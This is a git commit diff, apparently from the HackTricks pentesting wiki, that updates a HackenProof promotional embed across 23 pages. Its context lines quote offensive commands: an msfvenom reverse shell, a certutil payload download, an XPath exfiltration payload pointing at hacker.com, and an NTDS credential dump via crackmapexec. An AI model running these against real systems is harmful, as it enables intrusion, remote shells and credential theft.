This commit is contained in:
carlospolop 2023-02-27 10:54:26 +01:00
parent 4f3092e61d
commit 3edf173026
23 changed files with 61 additions and 61 deletions

View file

@ -71,7 +71,7 @@ Get Access Today:
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
### [WebSec](https://websec.nl/) ### [WebSec](https://websec.nl/)

View file

@ -22,7 +22,7 @@
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
## Wifi basic commands ## Wifi basic commands
@ -312,7 +312,7 @@ So broken and disappeared that I am not going to talk about it. Just know that _
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
## WPA/WPA2 PSK ## WPA/WPA2 PSK
@ -822,7 +822,7 @@ TODO: Take a look to [https://github.com/wifiphisher/wifiphisher](https://github
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
<details> <details>

View file

@ -27,7 +27,7 @@
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
@ -205,7 +205,7 @@ msfvenom -p cmd/unix/reverse_bash LHOST=<Local IP Address> LPORT=<Local Port> -f
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
<details> <details>

View file

@ -24,7 +24,7 @@
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
## Lolbas ## Lolbas
@ -338,7 +338,7 @@ certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
## **Cscript/Wscript** ## **Cscript/Wscript**
@ -594,7 +594,7 @@ WinPWN](https://github.com/SecureThisShit/WinPwn) PS console with some offensive
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
<details> <details>

View file

@ -22,7 +22,7 @@
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
### **Best tool to look for Linux local privilege escalation vectors:** [**LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) ### **Best tool to look for Linux local privilege escalation vectors:** [**LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)
@ -174,7 +174,7 @@
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
<details> <details>

View file

@ -22,7 +22,7 @@
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
## Linux Privesc ## Linux Privesc
@ -467,7 +467,7 @@ launchctl print gui/<user's UID>/com.company.launchagent.label
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
## Auto Start Extensibility Point (ASEP) ## Auto Start Extensibility Point (ASEP)
@ -1278,7 +1278,7 @@ sudo killall -HUP mDNSResponder
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
<details> <details>

View file

@ -23,7 +23,7 @@
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
## Android Applications Basics ## Android Applications Basics
@ -73,7 +73,7 @@ adb pull /data/app/com.android.insecurebankv2- Jnf8pNgwy3QA_U5f-n_4jQ==/base.apk
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
## Static Analysis ## Static Analysis
@ -267,7 +267,7 @@ An application may contain secrets (API keys, passwords, hidden urls, subdomains
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
## Dynamic Analysis ## Dynamic Analysis
@ -521,7 +521,7 @@ Probably you know about this kind of vulnerabilities from the Web. You have to b
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
## Automatic Analysis ## Automatic Analysis
@ -734,7 +734,7 @@ Useful to detect malware: [https://koodous.com/](https://koodous.com)
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
## Obfuscating/Deobfuscating code ## Obfuscating/Deobfuscating code
@ -819,7 +819,7 @@ For more information visit:
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
<details> <details>

View file

@ -23,7 +23,7 @@
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
## Android Security Model ## Android Security Model
@ -144,7 +144,7 @@ If developers, write in Java and the code is compiled to DEX bytecode, to revers
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
@ -476,7 +476,7 @@ Generally the MDM solutions perform functions like enforcing password policies,
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
<details> <details>

View file

@ -23,7 +23,7 @@
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
## Basic Information ## Basic Information
@ -119,7 +119,7 @@ The **rpcdump.exe** from [rpctools](https://resources.oreilly.com/examples/97805
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
<details> <details>

View file

@ -23,7 +23,7 @@
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
## Basic Information ## Basic Information
@ -136,7 +136,7 @@ If you are root you can **modify** the **mongodb.conf** file so no credentials a
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
<details> <details>

View file

@ -24,7 +24,7 @@
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
## WinRM ## WinRM
@ -177,7 +177,7 @@ winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}'
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
## WinRM connection in linux ## WinRM connection in linux
@ -346,7 +346,7 @@ Entry_2:
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
<details> <details>

View file

@ -27,7 +27,7 @@
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
@ -175,7 +175,7 @@ Now as can be seen below we have complete system access:
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}

View file

@ -23,7 +23,7 @@
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
## Basic Information ## Basic Information
@ -162,7 +162,7 @@ HGET <KEY> <FIELD>
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
## Redis RCE ## Redis RCE
@ -345,7 +345,7 @@ _For some reason (as for the author of_ [_https://liveoverflow.com/gitlab-11-4-7
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
<details> <details>

View file

@ -23,7 +23,7 @@
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
@ -196,7 +196,7 @@ curl http://127.0.0.1:80
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}

View file

@ -23,7 +23,7 @@
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
## Basic Information ## Basic Information
@ -396,7 +396,7 @@ There are other methods to get command execution, such as adding [extended store
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
## MSSQL Privilege Escalation ## MSSQL Privilege Escalation
@ -544,7 +544,7 @@ You probably will be able to **escalate to Administrator** following one of thes
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
## HackTricks Automatic Commands ## HackTricks Automatic Commands

View file

@ -23,7 +23,7 @@
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
## Basic Information ## Basic Information
@ -105,7 +105,7 @@ Entry_2:
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
<details> <details>

View file

@ -23,7 +23,7 @@
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
## What is CSP ## What is CSP
@ -473,7 +473,7 @@ Trick from [**here**](https://ctftime.org/writeup/29310).
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
## Unsafe Technologies to Bypass CSP ## Unsafe Technologies to Bypass CSP
@ -604,7 +604,7 @@ If you know how to exfiltrate info with WebRTC [**send a pull request please!**]
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
<details> <details>

View file

@ -23,7 +23,7 @@
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
## What is CSRF? ## What is CSRF?
@ -200,7 +200,7 @@ To set the domain name of the server in the URL that the Referrer is going to se
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
## **Exploit Examples** ## **Exploit Examples**
@ -607,7 +607,7 @@ with open(PASS_LIST, "r") as f:
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
<details> <details>

View file

@ -23,7 +23,7 @@
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
## File Inclusion ## File Inclusion
@ -439,7 +439,7 @@ Be sure to URL-encode payloads before you send them.
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
## LFI2RCE ## LFI2RCE
@ -637,7 +637,7 @@ If you include any of the files `/usr/bin/phar`, `/usr/bin/phar7`, `/usr/bin/pha
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
<details> <details>

View file

@ -22,7 +22,7 @@
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
@ -336,7 +336,7 @@ The **reset tokens must have an expiration time**, after it the token shouldn't
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
<details> <details>

View file

@ -23,7 +23,7 @@
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
## **Basic Syntax** ## **Basic Syntax**
@ -94,7 +94,7 @@ Info about how to make queries: [https://www.w3schools.com/xml/xpath\_syntax.asp
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
## Example ## Example
@ -337,7 +337,7 @@ doc-available(concat("http://hacker.com/oob/", RESULTS))
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
<details> <details>

View file

@ -27,7 +27,7 @@
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
@ -96,7 +96,7 @@ Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbos
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}

View file

@ -24,7 +24,7 @@
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
## Credentials Mimikatz ## Credentials Mimikatz
@ -180,7 +180,7 @@ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
## Stealing SAM & SYSTEM ## Stealing SAM & SYSTEM
@ -352,7 +352,7 @@ Download it from:[ http://www.tarasco.org/security/pwdump\_7](http://www.tarasco
💬 Participate in community discussions 💬 Participate in community discussions
{% embed url="https://twitter.com/intent/follow?original_referer=https%3A%2F%2Fwww.hackenproof.com%2F&screen_name=hackenproof" %}
<details> <details>